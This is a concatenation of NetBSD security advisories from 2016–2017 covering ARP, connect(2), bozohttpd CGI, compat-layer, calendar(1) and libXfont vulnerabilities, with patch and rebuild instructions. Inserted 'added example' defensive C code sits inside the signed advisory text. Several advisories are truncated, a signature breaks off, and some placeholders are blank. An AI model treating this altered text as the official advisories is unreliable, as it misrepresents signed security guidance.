sys/net/if_ethersubr.c  1.236   1.204.2.1   1.204.4.1       1.188.8.5   1.188.8.3.2.2   1.188.8.2.4.2
sys/net/if_fddisubr.c   1.104   1.88.2.1    1.88.6.1        1.81.14.2   1.81.14.1.2.1   1.81.20.1
sys/net/if_tokensubr.c  1.81    1.65.2.1    1.65.4.1        1.61.8.1    1.61.18.1       1.61.14.1

To update from CVS, re-build, and re-install the kernel:

  # cd src
  # cvs update -d -P -r VERSION sys/netinet/if_arp.c
  # cvs update -d -P -r VERSION sys/net/if_arcsubr.c
  # cvs update -d -P -r VERSION sys/net/if_ecosubr.c
  # cvs update -d -P -r VERSION sys/net/if_ethersubr.c
  # cvs update -d -P -r VERSION sys/net/if_fddisubr.c
  # cvs update -d -P -r VERSION sys/net/if_tokensubr.c
  # ./build.sh kernel=KERNCONF
  # mv /netbsd /netbsd.old
  # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
  # shutdown -r now

For more information on how to do this, see:

  http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

Maxime Villard for finding the issues and writing fixes.

Revision History
================

2017-02-17      Initial release

More Information
================

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/
  and
  http://www.NetBSD.org/Security/ .

Copyright 2017, The NetBSD Foundation, Inc. All Rights Reserved.
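The second ARP issue above is a missing length check: the hardware and protocol address lengths in the header were trusted as copy lengths. The following is an added example, written for this page and not taken from NetBSD's sys/netinet/if_arp.c, of how a receiver validates those fields against the bytes actually received before building a reply. The constants, the `arp_validate` return codes and the constructed sample packet are this example's own assumptions; the check is limited to Ethernet/IPv4 ARP, which is what the advisory's "over an Ethernet link" case concerns.

```c
/* Added example, not NetBSD kernel code: validate an ARP header's
 * ar_hln/ar_pln against the received length before any copy uses them. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ARPHRD_ETHER   1
#define ETHERTYPE_IP   0x0800
#define ARPOP_REQUEST  1
#define ARPOP_REPLY    2
#define ARP_FIXED_LEN  8        /* hrd(2) pro(2) hln(1) pln(1) op(2) */
#define ETHER_ADDR_LEN 6
#define IPV4_ADDR_LEN  4

struct arphdr_fixed {
    uint16_t ar_hrd;            /* hardware type */
    uint16_t ar_pro;            /* protocol type */
    uint8_t  ar_hln;            /* hardware address length (attacker-controlled) */
    uint8_t  ar_pln;            /* protocol address length (attacker-controlled) */
    uint16_t ar_op;             /* operation */
};

static uint16_t get_be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Returns 0 for a well-formed Ethernet/IPv4 ARP packet, or a negative
 * code naming the check that failed.  The lengths must both be the only
 * values this link/protocol pair allows AND the packet must really carry
 * 2*hln + 2*pln address bytes; 0xff is the "highest encodable length". */
int arp_validate(const uint8_t *pkt, size_t len, struct arphdr_fixed *out)
{
    struct arphdr_fixed h;
    size_t need;

    if (len < ARP_FIXED_LEN)
        return -1;              /* fixed header itself is truncated */
    h.ar_hrd = get_be16(pkt);
    h.ar_pro = get_be16(pkt + 2);
    h.ar_hln = pkt[4];
    h.ar_pln = pkt[5];
    h.ar_op  = get_be16(pkt + 6);
    if (h.ar_hrd != ARPHRD_ETHER)
        return -2;
    if (h.ar_pro != ETHERTYPE_IP)
        return -3;
    if (h.ar_hln != ETHER_ADDR_LEN)
        return -4;
    if (h.ar_pln != IPV4_ADDR_LEN)
        return -5;
    need = ARP_FIXED_LEN + 2 * (size_t)h.ar_hln + 2 * (size_t)h.ar_pln;
    if (len < need)
        return -6;              /* header promises more bytes than arrived */
    if (out != NULL)
        *out = h;
    return 0;
}

/* Build a reply only from a validated request.  Every memcpy length below
 * is a constant implied by the checked header, so nothing past `req` can
 * be read into the reply. Returns the reply length, 0 if no reply. */
size_t arp_build_reply(const uint8_t *req, size_t len,
                       const uint8_t my_hw[ETHER_ADDR_LEN],
                       uint8_t *reply, size_t cap)
{
    struct arphdr_fixed h;
    const size_t total = ARP_FIXED_LEN + 2 * ETHER_ADDR_LEN + 2 * IPV4_ADDR_LEN;

    if (arp_validate(req, len, &h) != 0 || h.ar_op != ARPOP_REQUEST)
        return 0;
    if (cap < total)
        return 0;
    memcpy(reply, req, ARP_FIXED_LEN);
    reply[6] = 0;
    reply[7] = ARPOP_REPLY;
    memcpy(reply + 8, my_hw, ETHER_ADDR_LEN);                    /* sender hw: ours */
    memcpy(reply + 14, req + 24, IPV4_ADDR_LEN);                 /* sender ip: request's target ip */
    memcpy(reply + 18, req + 8, ETHER_ADDR_LEN + IPV4_ADDR_LEN); /* target: the requester */
    return total;
}

/* Constructed sample request (not captured traffic); hln/pln are
 * parameters so the oversized-length case can be exercised. */
size_t build_sample_request(uint8_t buf[28], uint8_t hln, uint8_t pln)
{
    static const uint8_t tmpl[28] = {
        0x00, 0x01,                             /* hrd: Ethernet */
        0x08, 0x00,                             /* pro: IPv4 */
        0x06, 0x04,                             /* hln, pln (overwritten below) */
        0x00, 0x01,                             /* op: request */
        0x02, 0x00, 0x00, 0x00, 0x00, 0x01,     /* sender hw (locally administered) */
        0xc0, 0xa8, 0x01, 0x0a,                 /* sender ip 192.168.1.10 */
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,     /* target hw: unknown */
        0xc0, 0xa8, 0x01, 0x01,                 /* target ip 192.168.1.1 */
    };
    memcpy(buf, tmpl, sizeof tmpl);
    buf[4] = hln;
    buf[5] = pln;
    return sizeof tmpl;
}
```

With the length fields pinned to the values the link type permits and the received length checked against them, a packet advertising 0xff-byte addresses is dropped at `-4` before any copy, and a genuine 28-byte request still yields a 28-byte reply.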
Redistribution permitted only in full, unmodified form.

-----BEGIN PGP SIGNATURE-----

iQIcBAEBAgAGBQJYp0fRAAoJEAZJc6xMSnBuPH4P/3/uA1dSrmvpZzz3lx/l3OoJ
t/XC1ueebICOpwsjYcabydjDRH/TciolYQA9mfJyuIxVj6Ie5GKjsUjy20lD3Et7
6PQf2Ijdx5Ek0fL8Tnfs76HVtC/mjAKTP6pW2Gw9JoVlWAZ2TmDeFJWwGFIlMQs1
NetBSD Security Advisory 2017-001: Memory leak in the connect system call
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2017-001
                 =================================

Topic:          Memory leak in the connect system call

Version:        NetBSD-current:         source prior to Sun, Oct 31st 2016
                NetBSD 7.0 - 7.0.2:     affected
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected

Severity:       Local DoS

Fixed:          NetBSD-current:         Sun, Oct 31st 2016
                NetBSD-7-0 branch:      Tue, Nov 1st 2016
                NetBSD-7 branch:        Tue, Nov 1st 2016
                NetBSD-6-0 branch:      Fri, Nov 11th 2016
                NetBSD-6-1 branch:      Fri, Nov 11th 2016
                NetBSD-6 branch:        Fri, Nov 11th 2016

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

A memory leak in the kernel could allow a local user to use up kernel
memory via repeated calls to the connect system call, and thus to
freeze - or eventually panic - the system.

Technical Details
=================

When calling the connect system call on a particular file descriptor
with specific arguments, a kernel buffer allocated to temporarily hold a
path buffer was not freed. Performing such a call in a loop would cause
the kernel to run out of memory and eventually panic.

Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
The following instructions briefly summarise how to upgrade your
kernel. In these instructions, replace:

  ARCH      with your architecture (from uname -m),
  KERNCONF  with the name of your kernel configuration file and
  VERSION   with the file version below

File versions containing the fixes:

FILE                    HEAD    netbsd-7    netbsd-7-0      netbsd-6    netbsd-6-1      netbsd-6-0
----                    ----    --------    ----------      --------    ----------      ----------
sys/kern/uipc_usrreq.c  1.181   1.169.2.4   1.169.2.3.2.1   1.136.8.4   1.136.8.3.2.1   1.136.8.2.2.1

To update from CVS, re-build, and re-install the kernel:

  # cd src
  # cvs update -d -P -r VERSION sys/kern/uipc_usrreq.c
  # ./build.sh kernel=KERNCONF
  # mv /netbsd /netbsd.old
  # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
  # shutdown -r now

For more information on how to do this, see:

  http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

The Mootja Analysis Engine for detecting the issue, Maxime Villard for
developing it and writing a fix.

Revision History
================

2017-01-21      Initial release

More Information
================

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2017-001.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/
  and
  http://www.NetBSD.org/Security/ .

Copyright 2017, The NetBSD Foundation, Inc. All Rights Reserved.
Redistribution permitted only in full, unmodified form.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJYg41BAAoJEAZJc6xMSnBuFzYQALY+MeClp85wpGhLmxBOoVzQ
drDRSoosEZJG1n5yqUuyvAka2KYYCIfMIw2JH7chvf0bDRZnwl32IJJYLzLvFPwf
CVZibK990zSBxdiVQ9eOEr5K3RM/V4abxpa+3AYxPOyTwLpR0OMHhfI0pJ5eTo7X
hBWrY9pjSU/To5EjMEBMc6SnuGs+LnW1o2TUyT/UbrvBO6Zs8gBuk7mIhxy0xK5f
39eZAwPvS1BF28NnFgesrw4gd5RwzKUYXcTVcHuGGCszcyejjmepumbV8aLL+/zw
CetkXw8WMjM6YuPM9DEOCBDkYMElSAakkPATagK+25Agi81/HI2VNMwvER9Qinqk
VKy9+rlXNlxa3D9qCSYfRrn40xdQ6PSZfRCvG2KEGfF40wplH5dHZsRkmvMzt8kY
D+03F0eiifWnUVgdLhEYJQeGFoBkElIA20bH/NGhm0W/Rm3etxe0MQiW7lqzrOny
G3YW0hxrp/YOnxDJmn35VKshq7iUY5clko3rfy7XF1VEsz5dTGrJsGwPKe7B5ZIj
+Y4+p38KbfEACS0PLZVfEkSSd9eONwf31jp8e8rJAn9dGKLy/r8eQoFOIm61iPXJ
g00YtgfE/CI2Z9PLF00V+vV4hlr4v4PJvMshF3SY9CSpuqTC/A9a01nDEIZs9Y5d
nyZv4WFb3sTpLx5JzUEP
=uCbX
-----END PGP SIGNATURE-----
NetBSD Security Advisory 2016-005: bozohttpd CGI handlers potential remote code execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2016-005
                 =================================

Topic:          bozohttpd CGI handlers potential remote code execution

Version:        NetBSD-current:         20160415
                NetBSD 7.0:             affected
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected

Severity:       Potential execution of arbitrary commands as httpd user

Fixed:          NetBSD-current:         April 15, 2016
                NetBSD-7 branch:        April 15, 2016
                NetBSD-6 branch:        April 15, 2016
                NetBSD-6-1 branch:      April 15, 2016
                NetBSD-6-0 branch:      April 15, 2016
                pkgsrc:                 bozohttpd-20160415 corrects this issue

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Running programs as CGI handlers that were not designed to serve as such
may create a vulnerability, since bozohttpd would pass any arguments to
the executed binary. In the worst case scenario this may lead to remote
code execution.

This vulnerability has been assigned CVE-2015-8212.

Technical Details
=================

bozohttpd supports option -C, which can be used to add a CGI handler for
a particular file type. It was designed to support both CGI-aware and
non-CGI-aware programs to serve dynamic content. Binaries were executed
using arguments from the remote client. In the case of non-CGI programs
this can be abused to exploit features of such programs and change their
behaviour, which in the worst case scenario can lead to running
attacker-provided code. It was proven that arbitrary code can be executed
in the case of PHP-CLI as a CGI handler.

Solutions and Workarounds
=========================

This problem only affects users who use non-CGI-aware programs as CGI
handlers (such as sh, the CLI version of PHP, etc.) directly.

The simplest fix is to install the latest pkgsrc bozohttpd, which fixes
this problem (and run it instead of the system one). Support for non-CGI
handlers has been removed, as there is no way to securely handle users'
requests.

Binary update:

  cd /var/tmp
  ftp http://nyftp.netbsd.org/pub/NetBSD-dailybinary/sets/base.tgz
  cd /
  tar xzpf /var/tmp/base.tgz ./usr/libexec/httpd

with the following replacements:

  = the release version you are using
  = the source date of the build. 20160416* and later will fit
  = your system's architecture

The following instructions describe how to upgrade your bozohttpd
binaries by updating your source tree and rebuilding and installing a
new version of bozohttpd.

* NetBSD-current:

  Systems running NetBSD-current dated from before 2016-04-15 should be
  upgraded to NetBSD-current dated 2016-04-16 or later.

  The following files/directories need to be updated from the
  netbsd-current CVS branch (aka HEAD):

    src/libexec/httpd

  To update from CVS, re-build, and re-install bozohttpd:

    # cd src
    # cvs update -d -P libexec/httpd
    # cd libexec/httpd
    # make USETOOLS=no cleandir dependall
    # make USETOOLS=no install

* NetBSD 7.*:

  Systems running NetBSD 7.* sources dated from before 2016-04-15 should
  be upgraded from NetBSD 7.* sources dated 2016-04-16 or later.

  The following files/directories need to be updated from the netbsd-7,
  netbsd-7-0 branches:

    src/libexec/httpd

  To update from CVS, re-build, and re-install bozohttpd:

    # cd src
    # cvs update -r -d -P libexec/httpd
    # cd libexec/httpd
    # make USETOOLS=no cleandir dependall
    # make USETOOLS=no install

* NetBSD 6.*:

  Systems running NetBSD 6.* sources dated from before 2016-04-15 should
  be upgraded from NetBSD 6.* sources dated 2016-04-16 or later.

  The following files/directories need to be updated from the netbsd-6,
  netbsd-6-1 or netbsd-6-0 branches:

    src/libexec/httpd

  To update from CVS, re-build, and re-install bozohttpd:

    # cd src
    # cvs update -r -d -P libexec/httpd
    # cd libexec/httpd
    # make USETOOLS=no cleandir dependall
    # make USETOOLS=no install

Thanks To
=========

Thanks go to Mateusz Kocielski who found this problem and supplied the
fixes.

Revision History
================

2016-04-21      Initial release

More Information
================

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be
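The problem described in the advisory is a server handing client-supplied words to a handler's command line, where a program that does not speak CGI reads them as options. As an added example, not bozohttpd's own code, the following shows the policy that avoids that class of bug: the handler's argv is always exactly the handler and the script, and the query string is exposed only through the QUERY_STRING environment variable, even in the "indexed query" form (a query with no "=") that RFC 3875 section 4.4 would otherwise allow to become command-line words. The struct, function names and the sample paths are this example's assumptions.

```c
/* Added example, not bozohttpd code: build a CGI handler's argv/envp so
 * that no client-derived word ever reaches the handler's command line. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct cgi_exec {
    const char *argv[3];        /* handler, script path, NULL */
    char        query_env[1024]; /* "QUERY_STRING=<raw query>" */
    const char *envp[2];        /* query_env, NULL */
};

/* RFC 3875 section 4.4: a query string without '=' is an "indexed"
 * query that a server MAY pass as command-line words.  For sh or php-cli
 * those words are option input; we only detect the case here so a
 * server can log it, and never act on it. */
int cgi_query_is_indexed(const char *query)
{
    return query != NULL && query[0] != '\0' && strchr(query, '=') == NULL;
}

/* Fill `e` for execve(handler, argv, envp).  argv is fixed at
 * {handler, script}; the query, indexed or not, goes only into
 * QUERY_STRING.  Returns 0, or -1 if the query does not fit. */
int cgi_prepare(struct cgi_exec *e, const char *handler,
                const char *script, const char *query)
{
    int n;

    e->argv[0] = handler;
    e->argv[1] = script;
    e->argv[2] = NULL;
    n = snprintf(e->query_env, sizeof e->query_env,
                 "QUERY_STRING=%s", query != NULL ? query : "");
    if (n < 0 || (size_t)n >= sizeof e->query_env)
        return -1;              /* refuse rather than truncate silently */
    e->envp[0] = e->query_env;
    e->envp[1] = NULL;
    return 0;
}

/* Number of argv entries the handler would see. */
int cgi_argc(const struct cgi_exec *e)
{
    int n = 0;

    while (e->argv[n] != NULL)
        n++;
    return n;
}
```

A handler that is genuinely CGI-aware reads QUERY_STRING itself and loses nothing under this policy; one that is not, which is the case the advisory removed support for, at least cannot have its option parser driven from the request line.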
NetBSD Security Advisory 2016-004: Multiple vulnerabilities in the compatibility layers
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2016-004
                 =================================

Topic:          Multiple vulnerabilities in the compatibility layers

Version:        NetBSD current:         source prior to Sat, Aug 8th 2015
                NetBSD 7.0:             affected
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected

Severity:       Local DoS / Kernel execution redirection

Fixed:          NetBSD-current:         Sat, Aug 8th 2015
                NetBSD-7.0:             source prior to Sun, Aug 2nd 2015
                NetBSD-6-0 branch:      source prior to Thu, Apr 21st 2016
                NetBSD-6-1 branch:      source prior to Thu, Apr 21st 2016
                NetBSD-6 branch:        source prior to Thu, Apr 21st 2016

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Several compatibility layers are affected by several vulnerabilities:

 1) NetBSD 32bit compatibility: Memory leak in sendmsg
 2) NetBSD 32bit compatibility: Buffer Overflow in ioctl
 3) Digital UNIX (formerly OSF/1) compatibility: Zero-sized memory
    allocation

Each of them allows a local user to crash the system.

Technical Details
=================

For more clarity the layers affected will be referred to as COMPAT_xx,
where xx is the emulated system.

 1) A memory leak in COMPAT_NETBSD32's sendmsg system call could allow a
    local unprivileged user to make the kernel run out of memory, and
    eventually panic.

 2) An inverted logic in COMPAT_NETBSD32's ioctl system call could allow
    a local unprivileged user to control the size given to a memcpy on
    the kernel side, thereby allowing that user to overwrite kernel heap.

 3) Due to a missing input validation check in COMPAT_OSF1's sendmsg
    system call, a user could cause the kernel to perform a zero-sized
    memory allocation, resulting in a crash.

Solutions and Workarounds
=========================

-- Disable the compatibility modules --

You can achieve this with the modunload(8) tool. Please read the
appropriate manual page.

For example, you can disable the Linux modules by moving the kernel
object files out of the way. These are located in:

  /stand/${MACHINE_ARCH}/${KERNEL_VERSION}/modules/compat_${NAME}/compat_${NAME}.kmod

And running the following command to unload them:

  # modunload compat_${NAME}

The modules have dependencies, so you need to unload them in the proper
order.

You can also disable these modules by rebuilding your kernel without the
COMPAT_${NAME} options.

Note however that this is to be considered a temporary workaround, and
you are strongly advised to fix your system from source.

-- Fix from source --

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
The following instructions briefly summarise how to upgrade your
kernel. In these instructions, replace:

  ARCH      with your architecture (from uname -m),
  KERNCONF  with the name of your kernel configuration file and
  VERSION   with the file version below

File versions containing the fixes:

FILE                                        HEAD    netbsd-7    netbsd-6    netbsd-6-1      netbsd-6-0
----                                        ----    --------    --------    ----------      ----------
src/sys/compat/netbsd32/netbsd32_socket.c   1.42    1.41.14.1   1.39.2.3    1.39.2.2.6.1    1.39.2.2.4.1
src/sys/compat/netbsd32/netbsd32_ioctl.c    1.82    1.69.4.1    1.64.8.2    1.64.14.1       1.64.12.1
src/sys/compat/osf1/osf1_socket.c           1.21    N/A         1.20.14.1   1.20.28.1       1.20.20.1

To update from CVS, re-build, and re-install the kernel:

  # cd src
  # cvs update -d -P -r VERSION sys/compat/netbsd32/netbsd32_socket.c
  # cvs update -d -P -r VERSION sys/compat/netbsd32/netbsd32_ioctl.c
  # cvs update -d -P -r VERSION sys/compat/osf1/osf1_socket.c
  # ./build.sh kernel=KERNCONF
  # mv /netbsd /netbsd.old
  # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
  # shutdown -r now

For more information on how to do this, see:

  http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

Thanks to Maxime Villard for finding and fixing these issues.

Revision History
================

2016-04-21      Initial release

More Information
================

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2016-004.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/
  and
NetBSD Security Advisory 2016-003: Privilege escalation in calendar(1)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2016-003
                 =================================

Topic:          Privilege escalation in calendar(1)

Version:        NetBSD-current:         source prior to Wed, Jul 1st 2015
                NetBSD 7.0:             not affected
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected
                NetBSD 5.2 - 5.2.3:     affected
                NetBSD 5.1 - 5.1.5:     affected

Severity:       Local privilege escalation

Fixed:          NetBSD-current:         Jul 1st, 2015
                NetBSD-7 branch:        Jul 1st, 2015
                NetBSD-7-0 branch:      Jul 1st, 2015
                NetBSD-6 branch:        Jul 1st, 2015
                NetBSD-6-1 branch:      Jul 1st, 2015
                NetBSD-6-0 branch:      Jul 1st, 2015
                NetBSD-5 branch:        Jul 1st, 2015
                NetBSD-5-2 branch:      Jul 1st, 2015
                NetBSD-5-1 branch:      Jul 1st, 2015

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

calendar(1) is a utility that processes text files and displays lines
that match certain dates. The -a flag is used to process the default
calendar files of all users and mail them the results. This flag
requires super-user privileges, which are not dropped properly when
executing external programs. calendar(1) with the -a option is executed
by the daily(5) maintenance script.

Technical Details
=================

calendar(1) requires super-user privileges in order to process the
calendar files of each user. When processing a particular account, the
code drops its privileges incorrectly. The code changes only the
effective uid (euid) and effective gid (egid) of the running process,
and executes external programs such as cpp(1) and sendmail(1). This can
potentially be used to escalate an attacker's privileges or to process
files which are readable by the super-user only.

Additionally, the initgroups(3) call was missing. Thus, any supplementary
groups in effect when it is started are also exposed.

Solutions and Workarounds
=========================

Workaround
----------

Set run_calendar=NO in daily.conf(5) in order to prevent invoking
calendar(1) from the daily(5) maintenance script.

Solution
--------

1.) Binary update of affected versions (root is required to extract):

To apply a fixed version from a releng build, fetch a matching base.tgz
from nyftp.netbsd.org and extract the fixed binaries:

  # cd /var/tmp
  # ftp http://nyftp.netbsd.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tgz
  # cd /
  # tar xzpf /var/tmp/base.tgz /usr/bin/calendar

with the following replacements:

  REL   = the branch version you are using (e.g., netbsd-7-0, netbsd-6-1)
          [Note: netbsd-X represents the current _STABLE branch. Run
          "uname -v" to view which version you are updating.
          (e.g. netbsd-6 = 6.1_STABLE) You would use netbsd-X if you
          have _STABLE in your uname version.]
  BUILD = the source date of the build. 20150702Z and later will fix
  ARCH  = your system's architecture (e.g., i386, amd64, alpha)

  (e.g., /netbsd-7-0/20151120Z/amd64/)

2.) Source update of affected versions (root is required for install):

The following instructions describe how to upgrade your calendar(1)
binaries by updating your source tree and rebuilding and installing a
new version of calendar(1).

* NetBSD-current:

  Systems running NetBSD-current dated from before 2015-07-01 should be
  upgraded to NetBSD-current dated 2015-07-02 or later.

  The following files/directories need to be updated from the
  netbsd-current CVS branch (aka HEAD):

    usr.bin/calendar/calendar.c

  To update from CVS, re-build, and re-install calendar(1):

    # cd src
    # cvs update -d -P usr.bin/calendar/calendar.c
    # cd usr.bin/calendar
    # make USETOOLS=no cleandir dependall
    # make USETOOLS=no install

* NetBSD 5.* and 6.*:

  Systems running NetBSD 5.* and 6.* sources dated from before
  2015-07-01 should be upgraded from NetBSD 6.* sources dated 2015-07-02
  or later.

  The following files/directories need to be updated from the netbsd-5,
  netbsd-5-1, netbsd-5-2, netbsd-6, netbsd-6-0, or netbsd-6-1 branches:

    usr.bin/calendar/calendar.c

  To update from CVS, re-build, and re-install calendar(1):

    # cd src
    # cvs update -r -d -P usr.bin/calendar/calendar.c
    # cd usr.bin/calendar
    # make USETOOLS=no cleandir dependall
    # make USETOOLS=no install

Thanks To
=========

David Holland for reporting and providing a fix for this issue.

Revision History
================

2016-04-16      Initial release

More Information
================
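The Technical Details above name two separate mistakes: only the effective ids were changed before exec'ing cpp(1) and sendmail(1), so the saved/real uid stayed 0 and a child could switch back, and the supplementary group list was never reset. The following added example, written for this page and not calendar(1)'s code, shows a permanent drop in the required order with a verification step after it. It uses setgroups(2) with a single gid so it runs without a password database; a real calendar(1) would call initgroups(3) with the target user's name and primary gid at the same point. The function names and the "fail if root can be regained" check are this example's own.

```c
/* Added example, not NetBSD calendar(1) code: permanently drop privileges
 * before exec'ing helpers, then verify that the drop really happened. */
#define _DEFAULT_SOURCE 1       /* glibc: expose setgroups/seteuid prototypes */
#include <errno.h>
#include <grp.h>
#include <sys/types.h>
#include <unistd.h>

/* 1 if every id matches and, for a non-root target, root cannot be
 * regained; 0 otherwise.  The seteuid(0) probe is what distinguishes a
 * real drop from the seteuid/setegid-only change the advisory describes:
 * with the saved uid still 0 that probe would succeed. */
int privileges_dropped(uid_t uid, gid_t gid)
{
    if (getuid() != uid || geteuid() != uid)
        return 0;
    if (getgid() != gid || getegid() != gid)
        return 0;
    if (uid != 0 && seteuid(0) == 0)
        return 0;               /* became root again: drop was not permanent */
    return 1;
}

/* Order matters: supplementary groups first (needs root), then gid,
 * then uid (once uid is non-zero, setgid would fail).  setgid/setuid
 * set real, effective and saved ids, unlike setegid/seteuid.
 * Returns 0 on success, -1 with errno set on failure. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0) {
        /* Reset supplementary groups so none inherited from the caller
         * survive into the exec'd program; initgroups(3) would install
         * the target user's own list here instead. */
        if (setgroups(1, &gid) == -1)
            return -1;
    }
    if (setgid(gid) == -1)
        return -1;
    if (setuid(uid) == -1)
        return -1;
    if (!privileges_dropped(uid, gid)) {
        errno = EPERM;
        return -1;
    }
    return 0;
}
```

Run as an unprivileged user the function drops to that user's own ids (the setgroups step is skipped because it would fail without root) and the verification still confirms that `seteuid(0)` is refused; run as root it exercises the full path. Calling it before each exec, rather than once per process, is not enough if the exec'd program inherits a saved uid of 0, which is why the check probes for that case explicitly.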
NetBSD Security Advisory 2016-002: BDF file parsing issues in libXfont
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2016-002
                 =================================

Topic:          BDF file parsing issues in libXfont

Version:        NetBSD-current:         affected prior to 20150319
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected
                NetBSD 5.1 - 5.1.4:     affected
                NetBSD 5.2 - 5.2.2:     affected
                pkgsrc:                 affected

Severity:       remote DoS, potential local privilege escalation

Fixed:          NetBSD-current:         March 18th, 2015
                NetBSD-6 branch:        March 18th, 2015
                NetBSD-6-1 branch:      March 18th, 2015
                NetBSD-6-0 branch:      March 18th, 2015
                NetBSD-5 branch:        March 18th, 2015
                NetBSD-5-2 branch:      March 18th, 2015
                NetBSD-5-1 branch:      March 18th, 2015
                pkgsrc:                 libXfont-1.5.1 corrects this issue

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Ilja van Sprundel, a security researcher with IOActive, has discovered
an issue in the parsing of BDF font files by libXfont. Additional
testing by Alan Coopersmith and William Robinet with the American Fuzzy
Lop (afl) tool uncovered two more issues in the parsing of BDF font
files.

As libXfont is used by the X server to read font files, and an
unprivileged user with access to the X server can tell the X server to
read a given font file from a path of their choosing, these
vulnerabilities have the potential to allow unprivileged users to run
code with the privileges of the X server (often root access).

These vulnerabilities have been assigned CVE-2015-1802, CVE-2015-1803,
and CVE-2015-1804.

Technical Details
=================

CVE-2015-1802: bdfReadProperties: property count needs range check

  The bdf parser reads a count for the number of properties defined in a
  font from the font file, and allocates arrays with entries for each
  property based on that count. It never checked to see if that count
  was negative, or large enough to overflow when multiplied by the size
  of the structures being allocated, and could thus allocate the wrong
  buffer size, leading to out of bounds writes.

CVE-2015-1803: bdfReadCharacters: bailout if a char's bitmap cannot be read

  If the bdf parser failed to parse the data for the bitmap for any
  character, it would proceed with an invalid pointer to the bitmap data
  and later crash when trying to read the bitmap from that pointer.

CVE-2015-1804: bdfReadCharacters: ensure metrics fit into xCharInfo struct

  The bdf parser read metrics values as 32-bit integers, but stored them
  into 16-bit integers. Overflows could occur in various operations
  leading to out-of-bounds memory access.

X.Org believes all prior versions of this library contain these flaws,
dating back to its introduction in X11R5.

Solutions and Workarounds
=========================

Workaround: don't allow clients that might open unvetted fonts on your
X server. Note this includes web browsers.

Solution: replace a vulnerable libXfont with a fixed version.

Binary fixes: download

  http://nyftp.NetBSD.org/pub/NetBSD-daily/REL/DATE/ARCH/binary/sets/xbase.tgz

with
  REL   being your NetBSD release version
  DATE  being a date past the fix date for your release
  ARCH  being the architecture of the system to be fixed

libXfont paths will differ by version and architecture, depending on
whether your architecture uses /usr/X11R6 or /usr/X11R7:

X11R6:
                  ./usr/X11R6/lib/libXfont.so
                  ./usr/X11R6/lib/libXfont.so.1
                  ./usr/X11R6/lib/libXfont.so.1.5

X11R7:
  all versions    ./usr/X11R7/lib/libXfont.so
  netbsd-5*       ./usr/X11R7/lib/libXfont.so.2
                  ./usr/X11R7/lib/libXfont.so.2.0
  netbsd-6-0+     ./usr/X11R7/lib/libXfont.so.3
                  ./usr/X11R7/lib/libXfont.so.3.0

so e.g. for a NetBSD 6.0 or younger amd64 system you'd do:

  cd / && tar xzpf path-to/xbase.tgz ./usr/X11R7/lib/libXfont.so \
        ./usr/X11R7/lib/libXfont.so.3 \
        ./usr/X11R7/lib/libXfont.so.3.0

From source: affected files and fixed versions are:

X11R7: xsrc/external/mit/libXfont/dist/src/bitmap/bdfread.c
  netbsd-5-1    1.1.1.1.2.1.2.2
  netbsd-5-2    1.1.1.1.2.1.4.2
  netbsd-5      1.1.1.1.2.3
  netbsd-6-1    1.1.1.2.6.2
  netbsd-6-0    1.1.1.2.4.2
  netbsd-6      1.1.1.2.2.2
  netbsd-7      1.3.4.1
  HEAD          1.4

X11R6: xsrc/xfree/xc/lib/font/bitmap/bdfread.c
